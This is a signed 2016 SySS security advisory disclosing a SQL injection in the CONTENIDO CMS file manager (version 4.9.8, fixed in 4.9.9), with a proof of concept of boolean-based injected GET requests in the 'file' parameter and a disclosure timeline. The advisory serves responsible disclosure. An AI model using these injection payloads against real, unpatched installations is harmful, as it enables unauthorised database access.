-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-013 Product: CONTENIDO Official Maintainer: four for business AG Affected Version(s): 4.9.8 Tested Version(s): 4.9.8 Vulnerability Type: SQL Injection (CWE-74) Risk Level: High Solution Status: Fixed Maintainer Notification: 2016-02-18 Solution Date: 2016-02-24 Public Disclosure: 2016-04-18 CVE Reference: Not yet assigned Author of Advisory: Rainer Boie (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: CONTENIDO is an open source web content management system developed by four for business AG (see [1]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found out that a logged on back-end user with access to the file manager can conduct a SQL Injection attack due to insufficient input validation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using a fresh installation of CONTENIDO in version 4.9.8 and generating and logging in with a user with file manager access rights, the following HTTP GET request was used for the SQL Injecton attack: http://:/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png*&contenido=egk6j49murlb0iirq0to2fqdqn9c0662 The * marks the insertion point. The first request results in details for requested file: http://localhost/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='A&appendparameters=&startpage=&sortby=&sortmode=&thumbnailmode=&contenido=df7rt3o5rqc5spe4aipue0l9dc21jhp4 The second request in an error notification: http://localhost/contenido/main.php?area=upl_edit&frame=4&path=&file=example.png'%20AND%20'A'='B&appendparameters=&startpage=&sortby=&sortmode=&thumbnailmode=&contenido=df7rt3o5rqc5spe4aipue0l9dc21jhp4 Notification:
Could not load file example.png' AND 'A'='B

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: This issue was fixed in version 4.9.9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-02-18: Vulnerability reported to four for business AG 2016-02-24: Maintainer four for business AG released security fix version 4.9.9 2016-04-18: SySS discloses the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web site for CONTENIDO http://www.contenido.org [2] SySS Security Advisory SYSS-2016-013 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-013.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Rainer Boie of the SySS GmbH. E-Mail: rainer.boie (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCgAGBQJXKGi0AAoJEFwSgj1gjXrpuSsH/1DNd9rLNIVtRBZfr5DEfMc+ gojw8mhuyotMzd9mvkCKklWDNKbJzyIpw/oQrr9SfiZemaegsAzcTbQ3D9IvEFiq 9kk0eQrcDmoOZKZWAPytqpJrFs6S55CzMEZUrSAWdafWss8BdKzy5LSw9/cgin1U QUhjaDy4Ubk1E4qv4vNN/jw5ZuDh5dd+yqV7gyIR/kJ+qHX3N78CcRFET69jvxWc dlTdwz0o+hv9kF29YTk9B9vm8qXFL47l9fmrJ0nrEzZnmnAKikzJiViIYenoI6O+ K8BmPuC8O1NPpSZ4Jm4pUh3Y8tK/5J1zm77XkEwXuLXeT0d9Ckk5Ph9eG2SCrUg= =bsVJ -----END PGP SIGNATURE-----